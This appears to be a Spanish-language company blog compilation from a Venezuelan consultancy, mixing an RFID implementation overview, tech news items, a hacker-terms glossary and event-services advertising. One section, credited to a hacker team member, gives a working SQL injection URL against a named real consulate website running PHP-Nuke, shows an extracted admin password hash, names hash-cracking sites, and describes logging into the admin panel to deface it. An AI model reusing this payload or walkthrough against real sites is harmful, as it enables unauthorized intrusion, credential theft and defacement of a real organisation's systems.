RFID: Un Acercamiento Practico

7 Factores Críticos de éxito En Implementaciones RFID

Como Evitar Trampas durante la Implementación de RFID,

Logrando un Retorno mas rápido de Inversión.

“Lo inesperado nos sorprende, pues nos hemos instalado con demasiada seguridad en nuestras teorías, en nuestras ideas, y estas no tienen ninguna estructura para acoger lo nuevo. Lo nuevo brota (...); Nunca podemos predecir como se presentara, pero debemos contar con su llegada.”

Edgar Morín

Pensador Francés.

Introducción


Según pasa el tiempo, la cadena del suministro, tal y como la conocemos ahora, se ha venido transformando en un ente torpe y pesado, el cual consume cada vez mas recursos de la empresa tanto en flujo de efectivo como en recursos físicos, y al mismo tiempo se ha hecho muy predecible y sensible a los patrones y modelos de consumo del mercado. Se dice que "La visibilidad perfecta", ira emergiendo en casi cualquier industria, alrededor del mundo, llegando hasta el nivel del artículo.

Esta tendencia se ha venido desarrollando y ya se ha puesto en marcha mediante el inexorable avance en las tecnologías clave, tales como - microchips, nuevos materiales, miniaturización, radio de corto alcance, y administración, explotación y análisis de datos,.

Otra realidad es que todo negocio requiere manejar presiones crecientes y persistentes, provenientes del mundo de los inversionistas que cada vez exigen una administración financiera prudente que mejore el flujo de efectivo y la utilización de recursos, reducción del inventario en pie, y en lo general buscando mejorar la eficiencia de la compañía no solo en operaciones especificas sino con alcances de toda de la cadena de valor entera.

RFID: Una Tecnología Complementaria de Auto-ID

Como ya se ha mencionado, RFID es un concepto simple. Es conocido desde 1940, pero solo en los años recientes se han conseguido avances tecnológicos suficientes que permiten hacer consideraciones prácticas de este concepto en la cadena de distribución. Hasta ahora, las aplicaciones RFID se han implementado bajo aplicaciones propietarias y en ambientes cerrados con las limitantes y alcances solo dentro de las operaciones de la empresa que lo implemente.

El diseño del EPC de 96-bit asegura la identificación individual para 268 millones de compañías, para tener cada una hasta 68 miles de millones de números de serie para cada una de las 16 millones de clases de objetos.

Una explicacion breve de RFID podría resumirse en, una pequeña etiqueta electrónica que contiene un minúscula microprocesador y una pequeña antena de radio, todo esto colocado en una tarima, un embalaje y/o un articulo con un código de identificación formado por 64 o 96 bits, llamado Código Electrónico de Producto, o EPC. Esta etiqueta, se puede asociar a la “placa de un carro,” y puede ser colocado en cualquier punto dentro de la cadena de producción, aunque idealmente debería de colocarse en el punto origen del proceso de manufactura.

Retos en la implementación de RFID

• Costos del Sistema.
• Los Materiales importan.
• La Confiabilidad & Consistencia de la Transmisión Inalámbrica.
• Interferencia Electromagnética.
• Almacenamiento de Datos.
• Incompatibilidades en los Sistemas de Numeración.
• Variedad de Frecuencias RF.
• Rediseño del Proceso de Negocio.
• Compartiendo el Costo/ROI.

RFID esta en proceso de madurez y co-existirá de manera complementaria con otras tecnologías de auto-ID durante varios años.

Tabla 1: Ventajas Comparativas de las Tecnologías Clave de Auto-ID

Tecnología: Código de Barras
Función Primaria: Identificación automática & procesamiento de mercancía
Beneficios Únicos: Probada, gran penetración, precisa, diferentes formatos, relación costo-beneficio alto.

Tecnología: EAS.
Función Primaria: Retorno de inversión por disminución de merma.
Beneficios Únicos: Muy robusta, etiqueta pequeña, trabaja en presencia de metales & aluminio, diferentes formatos, muy difícil de burlar.

Tecnología: Administración de Video.
Función Primaria: Vigilancia de activos; apego a los procesos corporativos; identificación de robo interno.
Beneficios Únicos: Confirmación visual de eventos, administración remota, integración con otros sistemas.

Tecnología: RFID.
Función Primaria: Rastreo y ubicación de activos.
Beneficios Únicos: Identificación a nivel articulo; no requiere línea de vista; acelera los procesos reduciendo los errores.

Implementación RFID: 7 Factores Críticos de Éxito

1. Levantamiento para RF .
2. Instalación & Ajuste.
3. Sincronización de Lectores.
4. Administración de Cableado.
5. Diseño & Colocación de Etiquetas.
6. Administración de Dispositivos.
7. Administración de Datos.

Conclusión

Estamos altamente entusiasmados sobre el amplio rango de futuros beneficios prometidos por RFID que traerá a la logística de la cadena de distribución, y somos los mas animados ante el entusiasmo de la industria y nos sentimos privilegiados de poder participar como una parte importante en establecer programas pilotos. Se ha hecho un gran progreso a la fecha sobre este tema, sin embargo la industria esta solamente empezando. Mas que nunca, el secreto del éxito de RFID estará enfocado en su ejecución. Esto, según nuestro punto de vista, es lo que nos ayudara a nosotros a llegar el destino colectivo de esta tecnología, y será como podremos ayudarlos a ustedes a llegar a ese mismo destino.

(Se puede encontrara mas información de RFID en www.autoid.org o vía la publicación de la industria en línea, el “RFID Journal” en www.rfidjournal.com.)

Si usted desea contar con el asesoramiento de expertos y desarrollar su proyecto RFID nos puede contactar por http://www.hbr.com.ve/.

Hackers controlan miles de servidores DNS falsos

Los servidores DNS falsos envían a los usuarios a sitios igualmente falsos, donde son objeto de diversos ataques e intentos de intrusión.

En el marco de un seminario profesional organizado por Internet Society, en San Diego, Estados Unidos, Network and Distributed System Security Symposium, investigadores de Google y del Instituto Tecnológico de Georgia presentaron un informe según el cual intrusos controlan una red de servidores DNS.

DNS significa Domain Name System, y comprende un sistema que hace posible a los usuarios de Internet llegar a los sitios de su interés. La tarea básica de los servidores DBS es controlar la información sobre las direcciones IP asociadas a una dirección determinada.

Si un servidor DNS indica una dirección falsa para un servicio determinado el usuario no tendrá contacto con el servicio, sino será dirigido a la dirección alterada. En el peor de los casos, los usuarios entrarán en contacto con servicios malignos, que pueden ser empleados para penetrar la computadora del visitante, o para instalar en ella software espía.

Según el informe de Google y el instituto de Georgia, hay un total de 68 .000 servidores de Internet que entregan información falsa sobre direcciones IP.

En algunos casos, los servidores llevan al usuario a páginas adulteradas.

Fuente: San Jose Mercury News, con información de AP.

Nuevo súperchip concentrará todas las tecnologías de redes

Pronto se acabará el problema de tener distintos chips, cada uno para su protocolo de redes, en los teléfonos móviles modernos. Un nuevo súper chip podrá detectar todas las redes y comunicarse con ellas a través de todas las plataformas disponibles.

El nuevo chip es denominado BW1102 Softransceiver, y es producido por la compañía estadounidense Bitwave. El chip agrupa a todos los protocolos de distintos teléfonos móviles en una unidad. De esa forma hace innecesario incorporar nuevos chips en un nuevo teléfono, ya que automáticamente detectará la forma de conexión más rápida disponible.

El chip tiene soporte para GSM, EDGE, WCDMA y HDSPA, como asimismo para las tecnologías de banda ancha Wifi y Wimax. Esto implica que el nuevo chip abarcará un espectro de frecuencias desde los 700 Megahertz hasta los 3,2 Gigahertz, lo que le convierte en una buena alternativa también para computadoras portátiles y otras unidades móviles.

Naturalmente, los fabricantes de teléfonos móviles muestran satisfacción ante la posibilidad de poder equipar las futuras generaciones de teléfonos móviles con un chip único, que por cuenta propia determinará qué red y qué tecnología ocupar, sin interrumpir la conexión del usuario. La solución también será adecuada para el usuario debido a que las unidades móviles serán más baratas de producir, y por lo tanto disminuirán sus precios de venta al usuario final.

La compañía destaca además que el nuevo súper chip será fabricado con base en la tecnología de silicio CMOS, que ya ha sido usado por los grandes fabricantes de chips. Esto implica que los gastos de producción serán bajos desde el comienzo.

Fuente tomada de Diario Ti

En qué consisten los ataques por inyección de SQL

Este tipo de ataques se pueden dar sólo en sitios webs que utilicen bases de datos, por ejemplo los creados con php-nuke que utilizan MySQL,normalmente. Un atacante utilizará los enlaces del sitio web que accedan a la base de datos para cualquier tipo de consulta (mediante php, asp,jsp, etc) introduciendo en estos código alternativo para obtener más datos ó contraseñas. Incluso podría ejecutar casi cualquier tipo de instrucción SQL en la base de datos del sitio web (Delete, Drop, etc). Es más, si el motor de la base de datos es MySQL, el atacante, podríamodificar y visualizar ficheros

El hecho de que estos ataques sean tan frecuentes se debe a que no son muy complicados de realizar. Estos fallos de seguridad sólo residenen la capa de aplicación que ataca la base de datos, no dependen del Servidor web (Apache, Tomcat, IIS, etc) ni de la base de datos (Oracle,MySQL, SQL Server, etc).

Ejemplos de inyección de SQL:Un ejemplo que dare es el deface a la pagina del Consulado de Marruecos en España:

Tenemos la url

http://www.marocconsuladobcn.org/

a la cual le vamos agregar la inyeccion

modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

Lo cual quedaria asi:

http://www.marocconsuladobcn.org/modules.php?name=Search&type=comments&%20%20%20query=&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

Si es vulnerable al aplicar la inyeccion nos dara el user y el pass encriptado en md5

La contraseña es esta f94ff0b6e0c902639f5c6b15f1fdd4c4, para poder desencriptar el hash vamos a la pagina

http://md5.rednoize.com/ o http://gdataonline.com/seekhash.php

Luego de tener la clave desencriptada nos dirigimos a la pagina y al final de la url le añadimos admin.php lo cual quedaria asi (http://www.marocconsuladobcn.org/admin.php)

Luego logeamos y listo hemos accedido a la base de datos mysql y hacer diabluras.

By d4n1ux >>>ECUADORIANS HACKERS TEAM<<<.


Gracias d4n1ux por tu aporte...

Moisés J. Ramos Z.

Glosario de términos utilizados por hackers

Acá definiremos los términos más utilizados por los hackers en la web:

Hacker (del inglés hack, recortar) es el neologismo utilizado para referirse a un experto (Gurú) en varias o alguna rama técnica relacionada con las Tecnologías de la Información y las Telecomunicaciones: programación, redes de computadoras, sistemas operativos, hardware de red/voz, etc.

El glider, emblema hackerSu entendimiento es más sofisticado y profundo respecto a los sistemas informáticos, ya sea de tipo hardware o software. Se suele llamar hackeo y hackear a las obras propias de un hacker.

Cracker: Un cracker es alguien que viola la seguridad de un sistema informático de forma similar a como lo haría un hacker, sólo que a diferencia de este Ultimo, el cracker realiza la intrusión con fines de beneficio personal o para hacer daño a su objetivo. El término deriva de la expresión "criminal hacker", y fue creado alrededor de 1985 por contraposición al término hacker, en defensa de éstos últimos por el uso incorrecto del término.Se considera que la actividad de esta clase de cracker es dañina e ilegal.

Un phreaker es una persona que investiga los sistemas telefónicos, mediante el uso de tecnología por el placer de manipular un sistema tecnologicamente complejo y en ocasiones también para poder obtener algún tipo de beneficio como llamadas gratuitas.

Phreaker: El término Phreak , Phreaker o phreak telefónico es un término acuñado en la subcultura informática para denominar a todas aquellas personas que realizan Phreaking. Phreak es una conjunción de las palabras phone (teléfono en inglés) y freak, algo así­ como pirado por los telefonos y surgió en los Estados Unidos en los años 1960. También se refiere al uso de varias frecuencias de audio para manipular un sistema telefónico, ya que la palabra phreak se pronuncia de forma similar a frequency (frecuencia). A menudo es considerado y categorizado como hacking informático. También se le denomina la cultura H/P (H de Hacking y P de Phreaking).

Defacer: Un defacer es un usuario de ordenador con conocimientos avanzados caracterizado por usar puertas traseras, agujeros y bugs para acceder a los servidores. Por lo general los defacers son ambiciosos cuando de sistemas se trata, ya que no buscan agujeros en servidores pequeños, sino por lo general en los más usados o los más importantes.

Los defacers pueden considerarse útiles en la red para mantener los servidores actualizados ya que por lo general pasan horas investigando y encontrando agujeros. Cuando un defacer encuentra un agujero en un servidor accede a través de él y lo reporta a la lista de bugs encontrados, los administradores de los servidores pueden hacer el respectivo parche o reparación. Esto obliga a los administradores a mantener los servidores actualizados, libre de fallas de seguridad, a hacer los servidores cada vez más seguros y contribuye a los desarrolladores a mejorar el software.

Hacking: Es la acción que puede o es ejercida por un Hacker. Usualmente se refiere a la intrusión en un sistema informático.

El hacking no es la técnica de ejecutar una aplicación para robar contraseñas y romper un sistema a través de malware, spyware o un ping, por el contrario, se basa en el arte informático de construir y solucionar problemas que atenten contra la vulnerabilidad de un sistema o aplicación, compartiendo este mismo método con otros hackers.

Ingenieria Inversa: El objetivo de la ingeniería inversa es obtener información técnica a partir de un producto accesible al público, con el fin de determinar de qué está hecho, qué lo hace funcionar y cómo fue fabricado. Los productos más comunes que son sometidos a la ingeniería inversa son los programas de computadoras y los componentes electrónicos.

Este método es denominado ingeniería inversa porque avanza en dirección opuesta a las tareas habituales de ingeniería, que consisten en utilizar datos técnicos para elaborar un producto determinado. En general si el producto u otro material que fue sometido a la ingeniería inversa fue obtenido en forma apropiada, entonces el proceso es legítimo y legal.

El programa Samba es un claro ejemplo de ingeniería inversa, dado que permite a sistemas operativos UNIX compartir archivos con sistemas Microsoft Windows. El proyecto Samba tuvo que averiguar información clasificada (no liberada al público) sobre los aspectos técnicos relacionado con el sistema de archivos Windows. Lo mismo realiza el proyecto WINE para el conjunto de API de Windows y OpenOffice.org con los formatos propios de Microsoft Office.

La ingeniería inversa es un método de resolución. Aplicar ingeniería inversa a algo supone profundizar en el estudio de su funcionamiento, hasta el punto de que podemos llegar a entender, modificar, y mejorar dicho modo de funcionamiento.

Pero este término no sólo se aplica al software de protección. Así pues se considera ingeniería inversa también al estudio de todo tipo de elementos, por ejemplo equipos electrónicos, microcontroladores, etc..., siempre y cuando el resultado de dicho estudio repercuta en el entendimiento sde su funcionamiento.

Newbie: El término informal newbie o niubi (derivado de la pronunciación del inglés Newbie), se aplica generalmente para indicar a un principiante que ingresa a un grupo, comunidad, o actividad compleja, pero que presenta rasgos psicológicos característicos que no hacen que se integre rápidamente a ellos.

Inicialmente se aplicá el término para describir a un principiante que se adentraba en un campo de la computación, siendo comunmente usado para indicar a usuarios de internet de prominente práctica pero de corto conocimiento técnico, a un recién llegado a un foro o comunidad; pero posteriormente el uso de la palabra se ha extendido para también indicar a un recién llegado a cualquier grupo específico.

A diferencia del poseur (poser), al newbie si presentaría un verdadero interés en el grupo o actividad de la cual quiere aprender o integrarse; aunque su comportamiento en algunos casos puede llegar a ser inapropiado o equivocado.

Lammer: Lamer es un término coloquial inglés aplicado a una persona que producto de una falta de madurez, sociabilidad y/o habilidades técnicas, hace que sea considerado un incompetente en una materia o actividad específica, o dentro de un grupo o comunidad; esto a pesar de llevar un tiempo más que prudente, para aprender sobre la materia, actividad o adaptarse al grupo o comunidad en la cual se le considera un lamer.

En el idioma inglés se aplica en multitud de contextos, pero es por la proliferación de medios de comunicación por ordenador como ha llegado a nuestro vocabulario, siendo utilizada principalmente dentro del ámbito de Internet, o relacionado con la informática o los videojuegos.

Script Kiddies: Los «Script Kiddies» son crackers inexpertos que usan programas, scripts, exploits, troyanos, nukes... creados por terceros para romper la seguridad de un sistema. Suelen presumir de ser hackers o crackers cuando en realidad no poseen un grado relevante de conocimientos.

Son uno de los grupos que forman la sociedad «underground», y se caracterizan por:

• Tener pocos conocimientos sobre informática. Usar «cracks» o «exploits» como única forma de entrar en sistemas remotos.
  
• Acceder a sistemas remotos con la única finalidad de sentirse importantes.

Phishing : Phishing es un término utilizado en informática con el cual se denomina el uso de un tipo de ingeniería social, caracterizado por intentar adquirir información confidencial de forma fraudulenta, como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria. El estafador, mejor conocido como phisher se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico o algún sistema de mensajería instantanea.

Dado el creciente número de denuncias de incidentes relacionados con el phishing se requieren métodos adicionales de protección. Se han realizado intentos con leyes que castigan la práctica, campañas para prevenir a los usuarios y con la aplicación de medidas técnicas a los programas.

Espero haber nutrido un poco este vocabulario ya que lo veremos frecuentemente en las páginas de internet que hacen referencia a este tema.

.

.

.

Moisés J. Ramos Z.

Continuus® producto para el manejo de soluciones integrales en el levantamiento de datos en su evento.

En HBR.Q®, estamos concientes de la importancia que tiene para usted, el éxito en cada evento realizado, y es este éxito lo que nos ha posicionado como empresa líder a nivel de levantamiento y control de datos.

Nuestra experiencia nos ha demostrado, que la satisfacción que brinda el saborear dicho éxito, abarca en gran medida el resultado visible y se extiende con la intervención del resultado contable, tangible.

Para esto, HBR.Q® ha introducido en el mercado, un novedoso sistema, en el que haciéndose merito con la más alta tecnología, los equipos más modernos, y una fácil solución en base de datos, le brinda la mayor bienvenida a cada participante en su evento; permitiéndole contar de manera organizada, rápida y veraz los resultados del mismo.

Para adaptarnos a el nivel de exigencia de cada cliente, nos hemos dotado con diferentes herramientas electrónicas, siempre orientadas al desarrollo tecnológico, de esta manera, nos permitimos adecuarnos a eventos de tipo, social, corporativo y de espectáculos.

Elementos de última generación tales como: equipos móviles con cámara, voz o video para el control de acceso, PDA con teclado, para el levantamiento de base de datos; para una rápida fluidez, utilizamos, PDA con lectores de código de Barra y equipos fijos de lectura de códigos de barra, estos últimos sin necesidad de requerir manipulación operaria.


Pendientes de no dejar pasar ningún detalle, utilizamos la tecnología para generar impresiones de stiker de identificación a cada participante, impresiones de certificados, créditos o reconocimientos entregados en el evento.

Y a la hora del entretenimiento, HBR.Q®, asegura el mayor impacto posible, aportando novedosos software de recreación, participación, RIFAS y muchos otros, siempre preocupados por integrar el mejor concepto tecnológico.

Herramientas de fácil manipulación; personal de confianza; manejo confidencial, rápido y veraz de sus datos; aporte tecnológico y muchos otros; son tributos importantes que harán de su evento una ocasión inolvidable.

Sea parte de este novedoso mundo, que le brinda el control.

HBR.Q® Asesoría en Movilidad, C.A.
http://www.hbr.com.ve/

Nalvy X. Maldonado
Gerente Cuentas Especiales